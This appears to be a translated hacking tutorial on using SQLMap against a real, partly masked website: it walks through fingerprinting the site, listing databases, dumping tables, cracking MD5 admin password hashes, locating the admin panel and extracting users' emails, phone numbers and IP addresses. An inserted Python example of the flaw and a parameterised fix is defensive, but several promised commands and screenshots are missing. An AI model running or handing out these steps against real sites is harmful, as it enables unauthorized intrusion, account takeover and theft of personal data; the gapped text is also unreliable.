SQL Injection is a very common technique among attackers; almost all sites backed by SQL databases are vulnerable to SQL Injection (or Query Injection). A candidate is recognized by links ending in *.php?id=1 (the number can change), where "id" is the vulnerable parameter, but be careful: not all of them are vulnerable. Explaining properly what SQL injection is would keep us here for a while, so let's skip that and move on to SQLMap.
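As an added illustration that is not part of the original guide, here is the coding flaw behind a vulnerable "id" parameter next to its parameterised fix, in Python against an in-memory SQLite table of constructed sample rows (the table and function names are assumptions):

```python
import sqlite3

def make_db():
    # Constructed sample table standing in for a site's user data (not data from the guide).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1, "alice", "alice@example.org"),
        (2, "bob", "bob@example.org"),
    ])
    return conn

def lookup_vulnerable(conn, id_param):
    # The flaw behind "page.php?id=1": the raw query-string value is concatenated into the SQL
    # text, so whatever the client sends is parsed as part of the statement.
    sql = "SELECT id, name FROM users WHERE id = " + id_param
    return conn.execute(sql).fetchall()

def lookup_safe(conn, id_param):
    # Fix: validate the type, then bind the value as a parameter. The driver passes it
    # separately from the SQL text, so it can never change the statement's structure.
    try:
        id_value = int(id_param)
    except ValueError:
        return []  # reject anything that is not an integer id
    return conn.execute("SELECT id, name FROM users WHERE id = ?", (id_value,)).fetchall()

def demo():
    conn = make_db()
    normal = "1"
    probe = "1 OR 1=1"  # the textbook check for whether the parameter is injectable
    return {
        "vuln_normal": lookup_vulnerable(conn, normal),
        "vuln_probe": lookup_vulnerable(conn, probe),  # every row comes back: injectable
        "safe_normal": lookup_safe(conn, normal),
        "safe_probe": lookup_safe(conn, probe),        # rejected: []
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The same fix applies whatever the server language: in PHP the equivalent is a prepared statement with a bound parameter instead of string concatenation.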
We open a terminal as root with the command
then we navigate to the folder where SQLMap is located with the command
to launch SQLMap.
This is the structure (syntax) of SQLMap:
./sqlmap.py -u <www.sito.it/*.php?id=*> (-u stands for URL; the angle brackets mark where the target URL goes, and the output is shown on screen)
I will take as a target a slightly dated site (which we obfuscate for obvious reasons): http://www.p*****b.com/s*********e.php?id=1
(should be vulnerable)
therefore, as a first step, we fingerprint the site by passing it with the -u option
then we execute this command:
./sqlmap.py -u http://www.p*****b.com/s*********e.php?id=1
Now that we know (almost) everything about this site, we need to know the names of the databases, so we'll use this command:
./sqlmap.py -u http://www.p*****b.com/s*********e.php?id=1 --dbs
(--dbs stands for databases)
Once we have the database names, we select one with the -D option, so we run these two commands in order:
./sqlmap.py -u http://www.p*****b.com/s********e.php?id=1 -D p*****b
./sqlmap.py -u http://www.p*****b.com/s*********e.php?id=1 -D p*****b --tables --columns --threads 10 --dump
What the two commands do:
- With the first we ask SQLMap to analyze the database.
- With the second we ask SQLMap to print on screen all the contents of the database (tables, columns) and to use 10 threads for a faster search.
Once the scan is finished and passwords have been found, SQLMap will ask us whether to crack them, because unfortunately the passwords are stored as MD5 hashes. We press "y" to confirm the operation and choose the dictionary to use; I used SQLMap's default one by pressing "1". It then asks whether we want to use suffixes; we won't dwell on suffixes now, so we press "N", and the cracking procedure starts. If it cannot crack the passwords, it writes them (still hashed) in a table next to the site's ADMIN names, and we have to crack them ourselves with programs like hashcat.
Here is the cracking procedure:
Other passwords found, as you can see, are stored as MD5 hashes, and SQLMap asks us once again whether to crack them.
This is data it extracted, but I don't know exactly what it is...
Once we have the cracked passwords, we only have to look for the site's ADMIN control panel.
With SQLMap we can not only find passwords, we can also extract sensitive data such as EMails, or even phone numbers, IP addresses and more (as we can see in the picture)
To extract data of this type, we ask SQLMap to show only the tables whose columns hold that data, so we first run the following command to list all the available tables:
./sqlmap.py -u http://www.p*****b.com/s*********e.php?id=1 -D p*****b --tables --dump
The next command instead selects a specific table and column (the contents of the left column, to be clear): we have to identify tables like "wp_users" or "user_data", and columns like "emails", "phone_number", "ip", "last_ip" etc.
All this takes place with the command:
./sqlmap.py -u http://www.p*****b.com/s*********e.php?id=1 -D p*****b -T <name of the selected table> -C <name of the column chosen in the table (the left column)> --threads 10 --dump
I hope you enjoyed this guide!
Attention: the information in this guide could be used for illegal purposes, and the editorial staff of InTheBit assumes no responsibility. Test it all on your own site to evaluate its security; otherwise you could run into serious legal trouble.